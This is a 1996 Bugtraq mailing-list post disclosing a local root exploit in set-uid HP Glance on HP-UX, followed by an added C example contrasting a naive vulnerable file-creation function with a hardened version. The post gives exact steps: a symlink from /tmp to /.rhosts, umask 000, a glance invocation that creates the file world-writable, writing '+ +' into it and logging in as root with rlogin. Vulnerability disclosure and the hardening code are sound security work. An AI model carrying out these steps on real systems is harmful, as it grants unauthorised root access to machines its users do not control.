Bugtraq mailing list archives
Vulnerability in HP Glance?
From: jjacobi () nova umuc edu (John W. Jacobi)
Date: Mon, 23 Sep 1996 00:07:03 -0700
Hi again,

If this is out or old, I apologize.

Platform I exploited: HP 9000/700/HPUX9.05 & HP9000/800/HPUX9.04
Product I exploited: HP Glance version B.09.04
What I gained: root access in under a minute without the root password.

Subject: Creating a file as root, with world write permissions using HP Glance, while not being root, or truncating any file on the system.

Problem: You could create /.rhosts, /etc/hosts.equiv, or whatever else your heart desires and then place arbitrary contents in it. Perhaps in the case of the r-command files a + + would suffice. Or you could truncate any file that root can.

Possible short term resolution: Remove the SUID-ROOT thing off of glance.

How I exploited to get quick root access:

1. I logged in as my regular account.
2. I checked for a root .rhosts file, it did not exist.
3. I made a sym link called /tmp/tempfile to root's would-be .rhosts file like so:
       ln -s /.rhosts /tmp/tempfile
4. I set my umask to 000:
       umask 000
5. I ran glance with the following command line:
       glance -j 1 -f /tmp/tempfile -iterations 1
6. Thanks to glance the /.rhosts file suddenly appeared and was mode 666, sweet.
7. Next I typed (I could have vi'ed or something as well):
       echo "+ +" > /.rhosts
8. Then:
       rlogin localhost -l root
9. And, not surprisingly, I was logged in as root.

Of course a little C program would be nice to automate this, but what if the C compiler is not installed? You might still want to be root, wouldn't you???

Question: Since there seems to be many of these little beasties in HP-UX, does anyone know if the problem is of a single source, or just a lot of vulnerable programs?

Any feedback would be greatly appreciated...

John W. Jacobi
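The file-creation flaw reported above, next to a hardened form, as an added example that is not part of the original post and not HP's code. naive_create is an assumed model of the behaviour the post describes (glance's source is not on the page); all function names are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed model of the reported behaviour: follow symlinks at a user-supplied
 * path and create the file 0666, leaving the final mode to the caller's umask. */
int naive_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened: O_EXCL fails if anything (even a dangling symlink) already exists
 * at path, O_NOFOLLOW is a second guard, and the mode is requested as 0600 and
 * pinned with fchmod(), so umask 000 cannot produce a world-writable file. */
int safe_create(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    if (fchmod(fd, 0600) != 0) {
        close(fd);
        unlink(path);
        return -1;
    }
    return fd;
}

/* For a set-uid program: create the user-named file with the invoking user's
 * identity, then restore the saved effective uid. */
int create_as_invoker(const char *path)
{
    uid_t saved = geteuid();
    if (seteuid(getuid()) != 0) return -1;
    int fd = safe_create(path);
    if (seteuid(saved) != 0) {
        if (fd >= 0) close(fd);
        return -1;
    }
    return fd;
}

/* Permission bits of path itself (lstat does not follow symlinks); -1 if absent. */
int mode_of(const char *path)
{
    struct stat st;
    return lstat(path, &st) == 0 ? (int)(st.st_mode & 07777) : -1;
}
```

With the effective uid switched to the invoker before the open, a symlink pointing at a root-owned location also fails on ordinary permission checks, independent of the O_EXCL guard.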